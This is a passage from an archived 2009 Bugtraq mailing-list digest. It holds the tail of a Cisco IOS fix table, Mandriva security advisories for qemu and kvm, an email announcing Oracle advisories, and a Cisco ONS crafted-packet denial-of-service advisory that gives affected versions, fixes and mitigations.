|------------+-------------+-------------|
| 12.2YH     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YJ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YK     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2YM     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.2YN     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2YP     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2YQ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YR     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YS     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2YT     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YU     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YW     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2YZ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.2(13)ZC  |             |
|            | are         |             |
| 12.2ZC     | vulnerable, |             |
|            | release     |             |
|            | 12.2(13)ZC  |             |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|------------+-------------+-------------|
| 12.2ZD     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2ZE     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2ZF     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2ZG     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.2ZH     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.2ZJ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZP     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2ZU     | migrate to  |             |
|            | any release |             |
|            | in 12.2SXH  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2ZX     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
| 12.2ZY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2ZYA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.3-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3       | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3B      | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3BC     | 12.3(23)BC6 | 12.3(23)BC6 |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3BW     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3EU     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.3JA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JEC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3JK     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3JL     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.3JX     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3T      | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3TPC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3VA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XA     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.3XB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XC     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XD     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XE     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.3XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XG     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XI     | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XK     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XL     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XQ     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XR     | first fixed | 12.4(23)    |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XS     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XU     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3XW     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XX     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XY     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3XZ     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)T8  |
| 12.3YA     | first fixed | 12.4(23)    |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YD     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YF     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YG     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YH     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YI     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YK     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YM     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YQ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YS     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YT     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YU     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3YX     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.3YZ     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.3ZA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.4-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
| 12.4       | 12.4(16)    | 12.4(23)    |
|------------+-------------+-------------|
| 12.4JA     | 12.4(16b)JA | 12.4(16b)   |
|            |             | JA1         |
|------------+-------------+-------------|
| 12.4JDA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JK     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JL     | 12.4(3)JL1  | 12.4(3)JL1  |
|------------+-------------+-------------|
| 12.4JMA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4JMB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(16b)   |
| 12.4JX     | first fixed | JA1         |
|            | in 12.4JA   |             |
|------------+-------------+-------------|
| 12.4MD     | 12.4(15)MD  | 12.4(15)MD2 |
|------------+-------------+-------------|
| 12.4MR     | 12.4(16)MR  |             |
|------------+-------------+-------------|
| 12.4SW     | 12.4(11)SW3 | 12.4(15)T8  |
|------------+-------------+-------------|
| 12.4T      | 12.4(15)T   | 12.4(15)T8  |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XA     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XB     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XC     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XD     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XE     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XG     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XJ     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XK     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XL     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XM     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XN     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XP     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.4XQ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XR     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.4XT     | first fixed | 12.4(15)T8  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
| 12.4XV     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            |             | 12.4(11)    |
|            |             | XW10;       |
| 12.4XW     | 12.4(11)XW3 | Available   |
|            |             | on          |
|            |             | 22-JAN-2009 |
|------------+-------------+-------------|
| 12.4XY     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4XZ     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.4YA     | Not         |             |
|            | Vulnerable  |             |
+----------------------------------------+

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt

To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:008 ] qemu
Date: Tue, 13 Jan 2009 22:47:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMyaj-0004iA-BN@titan.mandriva.com>

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:008
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : qemu
 Date    : January 14, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 VNC server of qemu version 0.9.1 and earlier, which could lead to
 denial-of-service attacks (CVE-2008-2382), and make it easier for
 remote crackers to guess the VNC password (CVE-2008-5714).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 502c50a55fdb3e3e8ab0456be79a08b1  2009.0/i586/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.i586.rpm
 bf48619b2f7cb0275d379682a4795dc1  2009.0/i586/qemu-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm
 4fb74c4d8356442ccd9c6ddd063f4191  2009.0/i586/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.i586.rpm 
 5a32fdf2019085e4c3d386bad34b1900  2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 99f7c6b4de73bcab46664c90ae6edc50  2009.0/x86_64/dkms-kqemu-1.4.0-0.pre1.0.1mdv2009.0.x86_64.rpm
 a22b95b6a4673f1300742b4777c4149b  2009.0/x86_64/qemu-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm
 502371419a98b187c9db90e4217242de  2009.0/x86_64/qemu-img-0.9.1-0.r5137.1.1mdv2009.0.x86_64.rpm 
 5a32fdf2019085e4c3d386bad34b1900  2009.0/SRPMS/qemu-0.9.1-0.r5137.1.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

Date: Wed, 14 Jan 2009 13:45:07 +0300
From: Alexandr Polyakov <alexandr.polyakov@dsec.ru>
X-Mailer: The Bat! (v3.99.29) Professional
Reply-To: Alexandr Polyakov <alexandr.polyakov@dsec.ru>
Organization: Digital Security
X-Priority: 3 (Normal)
Message-ID: <1554988.20090114134507@dsec.ru>
To: bugtraq@securityfocus.com, vuln@secunia.com,
packet@packetstormsecurity.org
Subject: Oracle CPU Jan 2009 Advisories.

Advisories for Oracle CPU January 2009 vulnerabilities attached.





Polyakov Alexandr
Information Security Analyst
______________________
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: a.polyakov@dsec.ru  
www.dsec.ru


Attachments:
  [DSECRG-09-001] Oracle Application Server (SOA) Linked  XSS vulnerability.txt
  [DSECRG-09-002] Oracle BEA Weblogic 10 Linked XSS vulnerability.txt
  [DSECRG-09-003] Oracle Database 11g  EXFSYS plsql injection vulnerability.txt


To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:009 ] kvm
Date: Tue, 13 Jan 2009 22:57:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMykP-0004lZ-18@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:009
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kvm
 Date    : January 14, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered and corrected in the
 VNC server of kvm version 79 and earlier, which could lead to
 denial-of-service attacks (CVE-2008-2382), and make it easier for
 remote crackers to guess the VNC password (CVE-2008-5714).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 acdff9c09970bba49f5b500723092f2b  2009.0/i586/kvm-74-3.1mdv2009.0.i586.rpm 
 8ee1433de23a7fec8bc768a66585368c  2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 b84f9ff6c8005e7de6996b3e1f04335d  2009.0/x86_64/kvm-74-3.1mdv2009.0.x86_64.rpm 
 8ee1433de23a7fec8bc768a66585368c  2009.0/SRPMS/kvm-74-3.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbVRimqjQ0CJFipgRAoEPAJ0dZtxXkpX7Ft2YHREKrePd7QV9WgCg827W
ha/fMpm4QxG0vwCrbHMLjK4=iT86
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:52:18 2009
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco ONS Platform Crafted Packet Vulnerability
Date: Wed, 14 Jan 2009 17:00:00 +0100
Message-id: <200901141701.ons@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco ONS Platform Crafted Packet
Vulnerability

Advisory ID: cisco-sa-20090114-ons

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

- ---------------------------------------------------------------------

Summary
======
The Cisco ONS 15300 series Edge Optical Transport Platform, the Cisco
ONS 15454 Optical Transport Platform, the Cisco ONS 15454 SDH
Multiservice Platform, and the Cisco ONS 15600 Multiservice Switching
Platform contain a vulnerability when processing TCP traffic streams
that may result in a reload of the device control card.

Cisco has released free software updates that address this
vulnerability.

There are no workarounds that mitigate this vulnerability. Several
mitigations exist that can limit the exposure of this vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ons.shtml

Affected Products
================
Vulnerable Products
+------------------

The following Cisco ONS products are vulnerable if running affected
software versions:

  * Cisco ONS 15310-CL and 15310-MA
  * Cisco ONS 15327
  * Cisco ONS 15454 and 15454 SDH
  * Cisco ONS 15600

Consult the section "Software Versions and Fixes" within this
advisory for affected software versions. To determine your software
version, view the Help > About window on the CTC management
software.

Products Confirmed Not Vulnerable
+--------------------------------

The following Cisco ONS products are confirmed not vulnerable:

  * Cisco ONS 15800 Series
  * Cisco ONS 15500 Series Extended Service Platform
  * Cisco ONS 15302
  * Cisco ONS 15305
  * Cisco ONS 15200 Series Metro DWDM Systems
  * Cisco ONS 15190 Series IP Transport Concentrator

No other Cisco products are currently known to be affected by this
vulnerability.

Details
======
The affected Cisco 15310-CL, 15310-MA, ONS 15327, ONS 15454, ONS
15454 SDH, and ONS 15600 hardware is managed through the CTX,
CTX2500, XTC, TCC/TCC+/TCC2/TCC2P, TCCi/TCC2/TCC2P, and TSC control
cards respectively. These control cards are usually connected to a
Data Communications Network (DCN). In this context the term DCN is
used to denote the network that transports management information
between a management station and the network entity (NE). This
definition of DCN is sometimes referred to as Management
Communication Network (MCN). The DCN is usually physically or
logically separated from the optical data network and isolated from
the Internet. This limits the exposure to the exploitation of this
vulnerability from the Internet.

A crafted stream of TCP traffic to the control cards on a node will
result in a reset of the corresponding control cards on this node. A
complete 3-way handshake is required on any open TCP port to be able
to exploit this vulnerability.

The timing for the data channels traversing the switch is provided by
the control cards.

When an active and a standby Cisco ONS 15310-MA, ONS 15310-CL, ONS
15327, ONS 15454 or ONS 15454 SDH control card reloads at the same
time, the synchronous data channels traversing the switch drop
traffic until the card comes back online. Asynchronous data channels
traversing the switch are not impacted. Manageability functions
provided by the network element using the CTX, CTX2500, XTC or TCC/
TCC+/TCC2/TCC2P control cards are not available until the control
card comes back online.

On the Cisco ONS 15600 hardware, whenever both the active and standby
control cards are rebooting at the same time, there is no impact to
the data channels traversing the switch because the TSC performs a
software reset which does not impact the timing being provided by the
TSC for the data channels.

Manageability functions provided by the network element through the
TSC control cards are not available until the control card comes back
online.

This vulnerability is documented in Cisco bug ID CSCsr41128 
and has been assigned Common Vulnerabilities and Exposures (CVE) 
identifier CVE-2008-3818.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

CVSS Base Score - 7.8

  Access Vector         : Network
  Access Complexity     : Low
  Authentication        : None
  Confidentiality Impact: None
  Integrity Impact      : None
  Availability Impact   : Complete

CVSS Temporal Score - 6.4

  Exploitability        : Functional
  Remediation Level     : Official-Fix
  Report Confidence     : Confirmed

Impact
=====
Successful exploitation of this vulnerability will result in a reset
of the node's control card. Repeated attempts to exploit this
vulnerability could result in a sustained DoS condition, dropping the
synchronous data channels traversing the switch (Cisco ONS 15310-MA,
ONS 15310-CL, ONS 15327, ONS 15454, ONS 15454 SDH) and preventing
manageability functions provided by the network element control cards
(all ONS switches) until the control card comes back online.

Software Versions and Fixes
==========================
When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

+-------------------------------------------------------------------------+
| Affected Major Release          | First Fixed Release                   |
|---------------------------------+---------------------------------------|
| 7.0                             | Note: Releases prior to 7.0.2 are not |
|                                 | vulnerable. First fixed in 7.0.7      |
|---------------------------------+---------------------------------------|
| 7.2                             | Note: Releases prior to 7.2.2 are not |
|                                 | vulnerable. First fixed in 7.2.3      |
|---------------------------------+---------------------------------------|
| 8.0                             | Vulnerable; migrate to 8.5.3 or       |
|                                 | later.                                |
|---------------------------------+---------------------------------------|
| 8.5                             | Note: Releases prior to 8.5.1 are not |
|                                 | vulnerable. First fixed in 8.5.3      |
|---------------------------------+---------------------------------------|
| 9.0                             | Not vulnerable.                       |
+-------------------------------------------------------------------------+

Note: Releases prior to 7.0 are not affected by this vulnerability.

Workarounds
==========
There are no workarounds for this vulnerability. The following
general mitigation actions help prevent remote exploitation:

  * Isolate DCN:
    Ensuring the DCN is physically or logically separated from the
    customer network and isolated from the Internet will limit the
    exposure to the exploitation of these vulnerabilities from the
    Internet or customer networks.
  * Apply Transit Access Control Lists:
    Apply access control lists (ACLs) on routers / switches /
    firewalls installed in front of the vulnerable network devices
    such that TCP/IP traffic destined for the CTX, CTX2500, XTC, TCC2
    /TCC2+/TCC2P, or TSC control cards on the ONS is allowed only
    from the network management workstations.
    For examples on how to apply ACLs on Cisco routers, refer to the
    white paper "Transit Access Control Lists: Filtering at Your
    Edge", which is available at the following link: 
    http://www.cisco.com/en/US/customer/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml

Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Mitigation Bulletin
companion document for this advisory, which is available at the
following link: 
http://www.cisco.com/warp/public/707/cisco-amb-20090114-ons.shtml

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at 
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at 
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized 
